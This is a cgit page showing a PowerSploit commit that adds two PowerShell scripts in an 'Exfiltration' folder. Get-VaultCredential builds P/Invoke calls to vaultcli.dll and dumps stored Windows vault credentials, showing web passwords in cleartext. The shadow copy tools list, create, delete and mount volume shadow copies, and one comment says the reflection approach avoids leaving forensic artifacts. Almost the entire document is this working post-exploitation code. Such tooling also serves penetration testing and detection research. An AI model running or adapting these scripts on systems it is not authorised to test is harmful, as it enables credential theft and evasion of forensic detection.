aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration
diff options
context:
space:
mode:
authorMatt Graeber <PowerShellMafia@users.noreply.github.com>2015-11-04 13:41:36 -0500
committerMatt Graeber <PowerShellMafia@users.noreply.github.com>2015-11-04 13:41:36 -0500
commit2dd1f5920d08d877628154bcbe8c2a93f2b835af (patch)
treefc68c81f32a44c893a16849baab858ef1667c7c9 /Exfiltration
parent5a812ce82361bf65443fc9c545c091e21e98fe80 (diff)
downloadPowerSploit-2dd1f5920d08d877628154bcbe8c2a93f2b835af.tar.gz
PowerSploit-2dd1f5920d08d877628154bcbe8c2a93f2b835af.zip
Revert "Normalizing all files to ascii encoding"
This reverts commit 5a812ce82361bf65443fc9c545c091e21e98fe80.
Diffstat (limited to 'Exfiltration')
-rw-r--r--Exfiltration/Get-VaultCredential.ps1401
-rw-r--r--Exfiltration/VolumeShadowCopyTools.ps1292
2 files changed, 693 insertions, 0 deletions
diff --git a/Exfiltration/Get-VaultCredential.ps1 b/Exfiltration/Get-VaultCredential.ps1
index e69de29..c830fa2 100644
--- a/Exfiltration/Get-VaultCredential.ps1
+++ b/Exfiltration/Get-VaultCredential.ps1
@@ -0,0 +1,401 @@
+function Get-VaultCredential
+{
+<#
+.SYNOPSIS
+
+Displays Windows vault credential objects including cleartext web credentials.
+
+PowerSploit Function: Get-VaultCredential
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Get-VaultCredential enumerates and displays all credentials stored in the Windows
+vault. Web credentials, specifically are displayed in cleartext. This script was
+inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
+
+.EXAMPLE
+
+Get-VaultCredential
+
+.NOTES
+
+Only web credentials can be displayed in cleartext.
+#>
+ [CmdletBinding()] Param()
+
+ $OSVersion = [Environment]::OSVersion.Version
+ $OSMajor = $OSVersion.Major
+ $OSMinor = $OSVersion.Minor
+
+ #region P/Invoke declarations for vaultcli.dll
+ $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)
+
+ $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])
+ $null = $EnumBuilder.DefineLiteral('Undefined', -1)
+ $null = $EnumBuilder.DefineLiteral('Boolean', 0)
+ $null = $EnumBuilder.DefineLiteral('Short', 1)
+ $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)
+ $null = $EnumBuilder.DefineLiteral('Int', 3)
+ $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)
+ $null = $EnumBuilder.DefineLiteral('Double', 5)
+ $null = $EnumBuilder.DefineLiteral('Guid', 6)
+ $null = $EnumBuilder.DefineLiteral('String', 7)
+ $null = $EnumBuilder.DefineLiteral('ByteArray', 8)
+ $null = $EnumBuilder.DefineLiteral('TimeStamp', 9)
+ $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)
+ $null = $EnumBuilder.DefineLiteral('Attribute', 11)
+ $null = $EnumBuilder.DefineLiteral('Sid', 12)
+ $null = $EnumBuilder.DefineLiteral('Last', 13)
+ $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()
+
+ $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])
+ $null = $EnumBuilder.DefineLiteral('Illegal', 0)
+ $null = $EnumBuilder.DefineLiteral('Resource', 1)
+ $null = $EnumBuilder.DefineLiteral('Identity', 2)
+ $null = $EnumBuilder.DefineLiteral('Authenticator', 3)
+ $null = $EnumBuilder.DefineLiteral('Tag', 4)
+ $null = $EnumBuilder.DefineLiteral('PackageSid', 5)
+ $null = $EnumBuilder.DefineLiteral('AppStart', 100)
+ $null = $EnumBuilder.DefineLiteral('AppEnd', 10000)
+ $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()
+
+ $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])
+ $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')
+ $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,
+ @([Runtime.InteropServices.LayoutKind]::Explicit),
+ $CharsetField,
+ @([Runtime.InteropServices.CharSet]::Ansi))
+ $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)
+ $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')
+ $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')
+ $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')
+ }
+ $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')
+ $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')
+ $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')
+ $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')
+ $VAULT_ITEM = $TypeBuilder.CreateType()
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)
+ $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)
+ $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)
+ $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)
+ $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()
+
+
+ $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([Guid].MakeByRefType(),
+ [UInt32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([Int32],
+ [Int32].MakeByRefType(),
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Int32],
+ [Int32].MakeByRefType(),
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Guid].MakeByRefType(),
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [Int32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+ }
+ else
+ {
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
+ 'vaultcli.dll',
+ 'Public, Static',
+ [Reflection.CallingConventions]::Standard,
+ [Int32],
+ [Type[]] @([IntPtr],
+ [Guid].MakeByRefType(),
+ [IntPtr],
+ [IntPtr],
+ [IntPtr],
+ [Int32],
+ [IntPtr].MakeByRefType()),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+ }
+
+ $Vaultcli = $TypeBuilder.CreateType()
+ #endregion
+
+ # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.
+ function local:Get-VaultElementValue
+ {
+ Param (
+ [ValidateScript({$_ -ne [IntPtr]::Zero})]
+ [IntPtr]
+ $VaultElementPtr
+ )
+
+ $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)
+ $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)
+
+ switch ($PartialElement.Type)
+ {
+ $VAULT_ELEMENT_TYPE::String {
+ $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+ [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Boolean {
+ [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Short {
+ [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::UnsignedShort {
+ [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Int {
+ [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::UnsignedInt {
+ [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
+ }
+
+ $VAULT_ELEMENT_TYPE::Double {
+ [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])
+ }
+
+ $VAULT_ELEMENT_TYPE::Guid {
+ [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
+ }
+
+ $VAULT_ELEMENT_TYPE::Sid {
+ $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+ Write-Verbose "0x$($SidPtr.ToString('X8'))"
+ $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
+ $SidObject.Value
+ }
+
+ # These elements are currently unimplemented.
+ # I have yet to see these used in practice.
+ $VAULT_ELEMENT_TYPE::ByteArray { $null }
+ $VAULT_ELEMENT_TYPE::TimeStamp { $null }
+ $VAULT_ELEMENT_TYPE::ProtectedArray { $null }
+ $VAULT_ELEMENT_TYPE::Attribute { $null }
+ $VAULT_ELEMENT_TYPE::Last { $null }
+ }
+ }
+
+ $VaultCount = 0
+ $VaultGuidPtr = [IntPtr]::Zero
+ $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)
+
+ if ($Result -ne 0)
+ {
+ throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))"
+ }
+
+ $GuidAddress = $VaultGuidPtr
+
+ $VaultSchema = @{
+ ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'
+ ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'
+ ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'
+ ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'
+ ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'
+ ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'
+ ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'
+ ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'
+ ([Guid] '00000000-0000-0000-0000-000000000000') = $null
+ }
+
+ if ($VaultCount)
+ {
+ foreach ($i in 1..$VaultCount)
+ {
+ $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])
+ $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))
+
+ $VaultHandle = [IntPtr]::Zero
+
+ Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))"
+
+ $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)
+
+ if ($Result -ne 0)
+ {
+ Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+
+ $VaultItemCount = 0
+ $VaultItemPtr = [IntPtr]::Zero
+
+ $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)
+
+ if ($Result -ne 0)
+ {
+ $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
+ Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+
+ $StructAddress = $VaultItemPtr
+
+ if ($VaultItemCount)
+ {
+ foreach ($j in 1..$VaultItemCount)
+ {
+ $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)
+ $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))
+
+ $PasswordVaultItem = [IntPtr]::Zero
+
+ if ($OSMajor -ge 6 -and $OSMinor -ge 2)
+ {
+ $Result = $Vaultcli::VaultGetItem($VaultHandle,
+ [Ref] $CurrentItem.SchemaId,
+ $CurrentItem.pResourceElement,
+ $CurrentItem.pIdentityElement,
+ $CurrentItem.pPackageSid,
+ [IntPtr]::Zero,
+ 0,
+ [Ref] $PasswordVaultItem)
+ }
+ else
+ {
+ $Result = $Vaultcli::VaultGetItem($VaultHandle,
+ [Ref] $CurrentItem.SchemaId,
+ $CurrentItem.pResourceElement,
+ $CurrentItem.pIdentityElement,
+ [IntPtr]::Zero,
+ 0,
+ [Ref] $PasswordVaultItem)
+ }
+
+ $PasswordItem = $null
+
+ if ($Result -ne 0)
+ {
+ Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))"
+ continue
+ }
+ else
+ {
+ $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)
+ }
+
+ if ($VaultSchema.ContainsKey($VaultGuid))
+ {
+ $VaultType = $VaultSchema[$VaultGuid]
+ }
+ else
+ {
+ $VaultType = $VaultGuid
+ }
+
+ if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)
+ {
+ $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement
+ }
+ else
+ {
+ $Credential = $null
+ }
+
+ $PackageSid = $null
+
+ if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
+ {
+ $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
+ }
+
+
+ $Properties = @{
+ Vault = $VaultType
+ Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
+ Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
+ PackageSid = $PackageSid
+ Credential = $Credential
+ LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
+ }
+
+ $VaultItem = New-Object PSObject -Property $Properties
+ $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'
+
+ $VaultItem
+
+ $null = $Vaultcli::VaultFree($PasswordVaultItem)
+ }
+ }
+
+ $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
+ }
+ }
+} \ No newline at end of file
diff --git a/Exfiltration/VolumeShadowCopyTools.ps1 b/Exfiltration/VolumeShadowCopyTools.ps1
index e69de29..49fe22d 100644
--- a/Exfiltration/VolumeShadowCopyTools.ps1
+++ b/Exfiltration/VolumeShadowCopyTools.ps1
@@ -0,0 +1,292 @@
+function Get-VolumeShadowCopy
+{
+<#
+.SYNOPSIS
+
+ Lists the device paths of all local volume shadow copies.
+
+ PowerSploit Function: Get-VolumeShadowCopy
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+ Version: 2.0.0
+#>
+
+ $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
+
+ if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
+ {
+ Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
+ }
+
+ Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | ForEach-Object { $_.DeviceObject }
+}
+
+function New-VolumeShadowCopy
+{
+<#
+.SYNOPSIS
+
+ Creates a new volume shadow copy.
+
+ PowerSploit Function: New-VolumeShadowCopy
+ Author: Jared Atkinson (@jaredcatkinson)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+ Version: 2.0.0
+
+.DESCRIPTION
+
+ New-VolumeShadowCopy creates a volume shadow copy for the specified volume.
+
+.PARAMETER Volume
+
+ Volume used for the shadow copy. This volume is sometimes referred to as the original volume.
+ The Volume parameter can be specified as a volume drive letter, mount point, or volume globally unique identifier (GUID) name.
+
+.PARAMETER Context
+
+ Context that the provider uses when creating the shadow. The default is "ClientAccessible".
+
+.EXAMPLE
+
+ New-VolumeShadowCopy -Volume C:\
+
+ Description
+ -----------
+ Creates a new VolumeShadowCopy of the C drive
+#>
+ Param(
+ [Parameter(Mandatory = $True)]
+ [ValidatePattern('^\w:\\')]
+ [String]
+ $Volume,
+
+ [Parameter(Mandatory = $False)]
+ [ValidateSet("ClientAccessible")]
+ [String]
+ $Context = "ClientAccessible"
+ )
+
+ $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
+
+ if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
+ {
+ Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
+ }
+
+ # Save VSS Service initial state
+ $running = (Get-Service -Name VSS).Status
+
+ $class = [WMICLASS]"root\cimv2:win32_shadowcopy"
+
+ $return = $class.create("$Volume", "$Context")
+
+ switch($return.returnvalue)
+ {
+ 1 {Write-Error "Access denied."; break}
+ 2 {Write-Error "Invalid argument."; break}
+ 3 {Write-Error "Specified volume not found."; break}
+ 4 {Write-Error "Specified volume not supported."; break}
+ 5 {Write-Error "Unsupported shadow copy context."; break}
+ 6 {Write-Error "Insufficient storage."; break}
+ 7 {Write-Error "Volume is in use."; break}
+ 8 {Write-Error "Maximum number of shadow copies reached."; break}
+ 9 {Write-Error "Another shadow copy operation is already in progress."; break}
+ 10 {Write-Error "Shadow copy provider vetoed the operation."; break}
+ 11 {Write-Error "Shadow copy provider not registered."; break}
+ 12 {Write-Error "Shadow copy provider failure."; break}
+ 13 {Write-Error "Unknown error."; break}
+ default {break}
+ }
+
+ # If VSS Service was Stopped at the start, return VSS to "Stopped" state
+ if($running -eq "Stopped")
+ {
+ Stop-Service -Name VSS
+ }
+}
+
+function Remove-VolumeShadowCopy
+{
+<#
+.SYNOPSIS
+
+ Deletes a volume shadow copy.
+
+ PowerSploit Function: Remove-VolumeShadowCopy
+ Author: Jared Atkinson (@jaredcatkinson)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+ Version: 2.0.0
+
+.DESCRIPTION
+
+ Remove-VolumeShadowCopy deletes a volume shadow copy from the system.
+
+.PARAMETER InputObject
+
+ Specifies the Win32_ShadowCopy object to remove
+
+.PARAMETER DevicePath
+
+ Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.
+
+.EXAMPLE
+
+ Get-VolumeShadowCopy | Remove-VolumeShadowCopy
+
+ Description
+ -----------
+ Removes all volume shadow copy
+
+.EXAMPLE
+
+ Remove-VolumeShadowCopy -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
+
+ Description
+ -----------
+ Removes the volume shadow copy at the 'DeviceObject' path \\?\GLOBALROOT\DeviceHarddiskVolumeShadowCopy4
+#>
+ [CmdletBinding(SupportsShouldProcess = $True)]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]
+ [String]
+ $DevicePath
+ )
+
+ PROCESS
+ {
+ if($PSCmdlet.ShouldProcess("The VolumeShadowCopy at DevicePath $DevicePath will be removed"))
+ {
+ (Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $DevicePath}).Delete()
+ }
+ }
+}
+
+function Mount-VolumeShadowCopy
+{
+<#
+.SYNOPSIS
+
+ Mounts a volume shadow copy.
+
+ PowerSploit Function: Mount-VolumeShadowCopy
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+ Version: 2.0.0
+
+.DESCRIPTION
+
+ Mount-VolumeShadowCopy mounts a volume shadow copy volume by creating a symbolic link.
+
+.PARAMETER Path
+
+ Specifies the path to which the symbolic link for the mounted volume shadow copy will be saved.
+
+.PARAMETER DevicePath
+
+ Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.
+
+.EXAMPLE
+
+ Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS
+
+ Description
+ -----------
+ Create a mount point in 'C:\VSS' for each volume shadow copy volume
+
+.EXAMPLE
+
+ Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
+
+.EXAMPLE
+
+ Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS -DevicePath $_ }
+#>
+
+ Param (
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Path,
+
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]
+ [String[]]
+ $DevicePath
+ )
+
+ BEGIN
+ {
+ $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
+
+ if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
+ {
+ Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
+ }
+
+ # Validate that the path exists before proceeding
+ Get-ChildItem $Path -ErrorAction Stop | Out-Null
+
+ $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)
+
+ # Define [VSS.Kernel32]::CreateSymbolicLink method using reflection
+ # (i.e. none of the forensic artifacts left with using Add-Type)
+ $TypeBuilder = $ModuleBuilder.DefineType('VSS.Kernel32', 'Public, Class')
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateSymbolicLink',
+ 'kernel32.dll',
+ ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
+ [Reflection.CallingConventions]::Standard,
+ [Bool],
+ [Type[]]@([String], [String], [UInt32]),
+ [Runtime.InteropServices.CallingConvention]::Winapi,
+ [Runtime.InteropServices.CharSet]::Auto)
+ $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+ $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+ $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
+ @('kernel32.dll'),
+ [Reflection.FieldInfo[]]@($SetLastError),
+ @($true))
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
+
+ $Kernel32Type = $TypeBuilder.CreateType()
+ }
+
+ PROCESS
+ {
+ foreach ($Volume in $DevicePath)
+ {
+ $Volume -match '^\\\\\?\\GLOBALROOT\\Device\\(?<LinkName>HarddiskVolumeShadowCopy[0-9]{1,3})$' | Out-Null
+
+ $LinkPath = Join-Path $Path $Matches.LinkName
+
+ if (Test-Path $LinkPath)
+ {
+ Write-Warning "'$LinkPath' already exists."
+ continue
+ }
+
+ if (-not $Kernel32Type::CreateSymbolicLink($LinkPath, "$($Volume)\", 1))
+ {
+ Write-Error "Symbolic link creation failed for '$Volume'."
+ continue
+ }
+
+ Get-Item $LinkPath
+ }
+ }
+
+ END
+ {
+
+ }
+} \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 22:06:32 +0000